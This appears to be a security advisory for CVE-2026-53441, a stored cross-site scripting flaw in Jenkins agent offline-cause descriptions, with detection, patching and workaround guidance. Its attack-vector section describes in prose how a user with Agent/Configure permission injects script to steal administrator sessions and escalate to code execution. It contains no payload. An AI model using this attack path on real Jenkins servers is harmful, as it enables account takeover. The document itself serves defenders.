CVE-2026-53441: Jenkins Stored XSS Vulnerability

CVE-2026-53441 Overview

CVE-2026-53441 is a stored cross-site scripting (XSS) vulnerability in Jenkins, the widely deployed open-source automation server. The flaw exists in Jenkins versions 2.483 through 2.567 and LTS versions 2.492.1 through 2.555.2. Jenkins does not escape the user-provided description of a generic offline cause that can be set through the POST config.xml API. An authenticated attacker with Agent/Configure permission can inject arbitrary HTML or JavaScript that executes in the browser context of other Jenkins users.

Critical Impact
Authenticated attackers with Agent/Configure permission can inject persistent JavaScript that executes against other Jenkins users, enabling session theft and privilege escalation within the CI/CD environment.

Affected Products

Jenkins 2.483 through 2.567 (inclusive)
Jenkins LTS 2.492.1 through 2.555.2 (inclusive)
Jenkins instances exposing the POST config.xml API to users with Agent/Configure permission

Discovery Timeline

2026-06-10 - CVE CVE-2026-53441 published to NVD alongside Jenkins Security Advisory SECURITY-3731
2026-06-10 - Last updated in NVD database

Technical Details for CVE-2026-53441

Vulnerability Analysis

The vulnerability is a stored cross-site scripting issue [CWE-79] affecting the agent offline-cause subsystem in Jenkins. When an agent is taken offline, Jenkins records a description explaining the cause. This description can be set programmatically through the POST config.xml API endpoint. Jenkins fails to escape HTML metacharacters in this user-controlled description before rendering it in the web UI.

Any user viewing the affected agent page, including administrators, executes the injected payload in their browser session. Because the payload is persistent, every subsequent visit triggers execution until the description is cleared or the instance is patched.

Root Cause

The root cause is missing output encoding on the offline cause description field. Jenkins treats the field as trusted markup when rendering agent status pages, rather than escaping it as untrusted text. The POST config.xml API path bypasses any input sanitization applied to the standard web form, allowing raw HTML and <script> content to reach the data store unchanged.

Attack Vector

An attacker requires authenticated access with the Agent/Configure permission. The attacker submits a crafted XML payload to the agent's config.xml endpoint containing JavaScript inside the offline cause description element. Jenkins persists the payload. When a higher-privileged user, such as a Jenkins administrator, visits the agent page, the script executes under that user's session. Common exploitation outcomes include session cookie theft, CSRF token exfiltration, and triggering authenticated administrative actions that lead to remote code execution on the Jenkins controller.

No verified public exploit code is available. Refer to the Jenkins Security Advisory SECURITY-3731 for vendor technical details.

Detection Methods for CVE-2026-53441

Indicators of Compromise

Agent config.xml files containing HTML tags such as <script>, <img>, or <svg> inside the offline cause description element
HTTP POST requests to /computer/<agent-name>/config.xml from accounts with Agent/Configure but not administrative permissions
Audit log entries showing agent configuration changes from unexpected user accounts or service tokens

Detection Strategies

Inspect Jenkins agent configuration XML on disk under $JENKINS_HOME/nodes/*/config.xml for embedded markup in description fields
Monitor reverse proxy and Jenkins access logs for POST requests targeting config.xml endpoints on agent resources
Search browser DevTools and SIEM telemetry for unexpected script execution on Jenkins agent status pages

Monitoring Recommendations

Forward Jenkins audit logs and config.xml change events to a centralized log platform for correlation against user permission assignments
Alert on any modification to agent offline cause descriptions performed via API rather than the standard UI workflow
Track outbound requests from Jenkins user browsers to unknown domains, which can indicate XSS payload callbacks

How to Mitigate CVE-2026-53441

Immediate Actions Required

Upgrade Jenkins weekly releases to a version newer than 2.567 and LTS releases to a version newer than 2.555.2 as published in the vendor advisory
Audit all accounts holding the Agent/Configure permission and remove the grant from users who do not require agent management
Review existing agent configurations for malicious markup in offline cause descriptions and sanitize affected entries

Patch Information

Jenkins addresses CVE-2026-53441 in the fixed releases referenced in the Jenkins Security Advisory SECURITY-3731. The fix introduces proper HTML escaping on the offline cause description before rendering. Apply the upgrade through the standard Jenkins update process and restart the controller to load the patched code.

Workarounds

Restrict the Agent/Configure permission to trusted administrators until the upgrade is complete
Disable or firewall the POST config.xml API endpoint at the reverse proxy layer for non-administrative users
Enforce a strict Content Security Policy that blocks inline script execution on Jenkins UI pages where feasible

bash

# Example: identify users granted Agent/Configure via the Jenkins script console
# Navigate to Manage Jenkins > Script Console and run:
import jenkins.model.Jenkins
import hudson.model.Computer
Jenkins.instance.authorizationStrategy.with { strategy ->
  Jenkins.instance.securityRealm.allUsers.each { user ->
    if (user.impersonate().hasPermission(Computer.CONFIGURE)) {
      println "User with Agent/Configure: ${user.id}"
    }
  }
}